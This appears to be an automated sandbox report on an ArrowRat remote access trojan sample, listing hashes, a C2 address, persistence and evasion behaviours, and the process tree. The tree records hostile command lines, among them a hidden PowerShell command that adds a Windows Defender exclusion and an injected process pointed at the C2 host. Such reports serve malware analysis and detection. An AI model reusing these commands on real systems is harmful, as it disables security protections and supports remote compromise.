Overview

overview

10

Static

static

1

111.exe

windows10-2004-x64

Analysis

  • max time kernel
    264s
  • max time network
    267s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230220-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
  • submitted
    28-02-2023 01:47

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    111.exe

  • Size

    1.2MB

  • MD5

    e27749108c213382a99148b1e8db141d

  • SHA1

    342fff490afc93461090c3d096092de7799cedb7

  • SHA256

    d65bbb5f627ce7367a8f7e391a03b819f800f6606908e9423c791844ff129563

  • SHA512

    e8f1cf8e69435c3bd0265044d3fa03ae2b3f8ffac5ef1b4ffadc2db7b0cb38c804eaed12b9af90936db785fecb2039b77f869e7fa96f02f9aebacca2aecc7bb4

  • SSDEEP

    24576:yJTlBHCmG+3FLG2ffq44sR7auN9pEYXwhyYM/D/WSLkoAhP9FPZ1aKdw:6lVCgLJfqp47awp0h1yLDLJIlFWgw

Score
10/10
arrowratclientpersistencerat

Malware Config

Extracted

Family

arrowrat

Botnet

Client

C2

194.ip.ply.gg:54552

Mutex

oWzurbWMF

Signatures

  • ArrowRat

    Remote access tool with various capabilities first seen in late 2021.

    ratarrowrat
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
    persistence
  • Modifies Installed Components in the registry 2 TTPs 1 IoCs
    persistence
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 22 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 41 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 46 IoCs
  • Suspicious use of FindShellTrayWindow 50 IoCs
  • Suspicious use of SendNotifyMessage 21 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\111.exe
    "C:\Users\Admin\AppData\Local\Temp\111.exe"
    1⤵
    • Checks computer location settings
    • Adds Run key to start application
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4228
    • C:\ProgramData\WinSec.exe
      "C:\ProgramData\WinSec.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3972
    • C:\Users\Admin\AppData\Local\Temp\Client.exe
      "C:\Users\Admin\AppData\Local\Temp\Client.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4624
      • C:\Windows\explorer.exe
        "C:\Windows\explorer.exe"
        3⤵
        • Modifies Installed Components in the registry
        • Enumerates connected drives
        • Checks SCSI registry key(s)
        • Modifies registry class
        • Suspicious behavior: GetForegroundWindowSpam
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:1880
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client 194.ip.ply.gg 54552 oWzurbWMF
        3⤵
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:4856
        • C:\Windows\SysWOW64\shutdown.exe
          "C:\Windows\System32\shutdown.exe" -r -t 0
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1812
      • C:\Windows\System32\ComputerDefaults.exe
        "C:\Windows\System32\ComputerDefaults.exe"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2524
        • C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
          "PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\ClTTUeEWx\Client'
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5116
  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:972
  • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
    "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
    1⤵
    • Modifies registry class
    • Suspicious use of SetWindowsHookEx
    PID:4296
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x4 /state0:0xa3965055 /state1:0x41c64e6d
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of SetWindowsHookEx
    PID:2764

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\WinSec.exe
    Filesize

    1.2MB

    MD5

    e27749108c213382a99148b1e8db141d

    SHA1

    342fff490afc93461090c3d096092de7799cedb7

    SHA256

    d65bbb5f627ce7367a8f7e391a03b819f800f6606908e9423c791844ff129563

    SHA512

    e8f1cf8e69435c3bd0265044d3fa03ae2b3f8ffac5ef1b4ffadc2db7b0cb38c804eaed12b9af90936db785fecb2039b77f869e7fa96f02f9aebacca2aecc7bb4

    Download Submit

  • C:\ProgramData\WinSec.exe
    Filesize

    1.2MB

    MD5

    e27749108c213382a99148b1e8db141d

    SHA1

    342fff490afc93461090c3d096092de7799cedb7

    SHA256

    d65bbb5f627ce7367a8f7e391a03b819f800f6606908e9423c791844ff129563

    SHA512

    e8f1cf8e69435c3bd0265044d3fa03ae2b3f8ffac5ef1b4ffadc2db7b0cb38c804eaed12b9af90936db785fecb2039b77f869e7fa96f02f9aebacca2aecc7bb4

    Download Submit

  • C:\ProgramData\WinSec.exe
    Filesize

    1.2MB

    MD5

    e27749108c213382a99148b1e8db141d

    SHA1

    342fff490afc93461090c3d096092de7799cedb7

    SHA256

    d65bbb5f627ce7367a8f7e391a03b819f800f6606908e9423c791844ff129563

    SHA512

    e8f1cf8e69435c3bd0265044d3fa03ae2b3f8ffac5ef1b4ffadc2db7b0cb38c804eaed12b9af90936db785fecb2039b77f869e7fa96f02f9aebacca2aecc7bb4

    Download Submit

  • C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133220260978042626.txt
    Filesize

    75KB

    MD5

    e3417e64fd17fa01c90cf956829ca7ff

    SHA1

    f8960ede60ed71f3ca9f505556390518621393f6

    SHA256

    a55bc5d91308f7bb7cef9268f6333172653c4119c8641abcb0692116fecd860c

    SHA512

    3126805740cdea1d97c1887c0e0e33094b5e187d218f0b8b26c5305ed6aa1737d88a9434e3cfcec9bf1009c9a4fe53e441312e8c24171e08fad2eed0d08cf4a9

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    Filesize

    157KB

    MD5

    c4d6588bee90ee0c7dd9b674199b0302

    SHA1

    a3b5f94a66b3198046fec3dd72c0399b6767e5d3

    SHA256

    f902c427484c65c3bcd1543072e4c53da376a7ba6151fb6d1ccd990bb7a94be2

    SHA512

    24b7ccf87ec5cc5e3af783a6500b1de4f8a381f31e0baf96f7755cca2a92afee310bcfb3c3bf8b7c033f4161f9b53bbcbd605ee281861e3cd59727870e795a8f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    Filesize

    157KB

    MD5

    c4d6588bee90ee0c7dd9b674199b0302

    SHA1

    a3b5f94a66b3198046fec3dd72c0399b6767e5d3

    SHA256

    f902c427484c65c3bcd1543072e4c53da376a7ba6151fb6d1ccd990bb7a94be2

    SHA512

    24b7ccf87ec5cc5e3af783a6500b1de4f8a381f31e0baf96f7755cca2a92afee310bcfb3c3bf8b7c033f4161f9b53bbcbd605ee281861e3cd59727870e795a8f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\Client.exe
    Filesize

    157KB

    MD5

    c4d6588bee90ee0c7dd9b674199b0302

    SHA1

    a3b5f94a66b3198046fec3dd72c0399b6767e5d3

    SHA256

    f902c427484c65c3bcd1543072e4c53da376a7ba6151fb6d1ccd990bb7a94be2

    SHA512

    24b7ccf87ec5cc5e3af783a6500b1de4f8a381f31e0baf96f7755cca2a92afee310bcfb3c3bf8b7c033f4161f9b53bbcbd605ee281861e3cd59727870e795a8f

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_upxsbtpb.iif.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • memory/1880-197-0x0000000002FD0000-0x0000000002FD1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4228-152-0x0000023E6A260000-0x0000023E6A270000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4228-134-0x0000023E6A260000-0x0000023E6A270000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4228-150-0x0000023E6A260000-0x0000023E6A270000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4228-149-0x0000023E6A260000-0x0000023E6A270000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4228-151-0x0000023E6A260000-0x0000023E6A270000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4228-148-0x0000023E6A260000-0x0000023E6A270000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4228-135-0x0000023E4FF70000-0x0000023E4FF71000-memory.dmp

    Filesize

    4KB

    Download

  • memory/4228-133-0x0000023E4FB00000-0x0000023E4FC38000-memory.dmp

    Filesize

    1.2MB

    Download

  • memory/4296-207-0x00000268EB640000-0x00000268EB660000-memory.dmp

    Filesize

    128KB

    Download

  • memory/4296-205-0x00000268EB230000-0x00000268EB250000-memory.dmp

    Filesize

    128KB

    Download

  • memory/4296-203-0x00000268EB270000-0x00000268EB290000-memory.dmp

    Filesize

    128KB

    Download

  • memory/4624-332-0x0000000000920000-0x0000000000930000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4624-171-0x0000000000920000-0x0000000000930000-memory.dmp

    Filesize

    64KB

    Download

  • memory/4624-164-0x0000000000140000-0x000000000016C000-memory.dmp

    Filesize

    176KB

    Download

  • memory/4856-167-0x0000000005800000-0x0000000005892000-memory.dmp

    Filesize

    584KB

    Download

  • memory/4856-186-0x0000000006A00000-0x0000000006A50000-memory.dmp

    Filesize

    320KB

    Download

  • memory/4856-183-0x0000000006010000-0x0000000006076000-memory.dmp

    Filesize

    408KB

    Download

  • memory/4856-182-0x0000000006150000-0x00000000066F4000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/4856-168-0x00000000058A0000-0x000000000593C000-memory.dmp

    Filesize

    624KB

    Download

  • memory/4856-165-0x0000000000400000-0x0000000000418000-memory.dmp

    Filesize

    96KB

    Download

  • memory/5116-187-0x000001A5B9580000-0x000001A5B9590000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5116-191-0x000001A5B9580000-0x000001A5B9590000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5116-189-0x000001A5B9580000-0x000001A5B9590000-memory.dmp

    Filesize

    64KB

    Download

  • memory/5116-172-0x000001A5D2750000-0x000001A5D2772000-memory.dmp

    Filesize

    136KB

    Download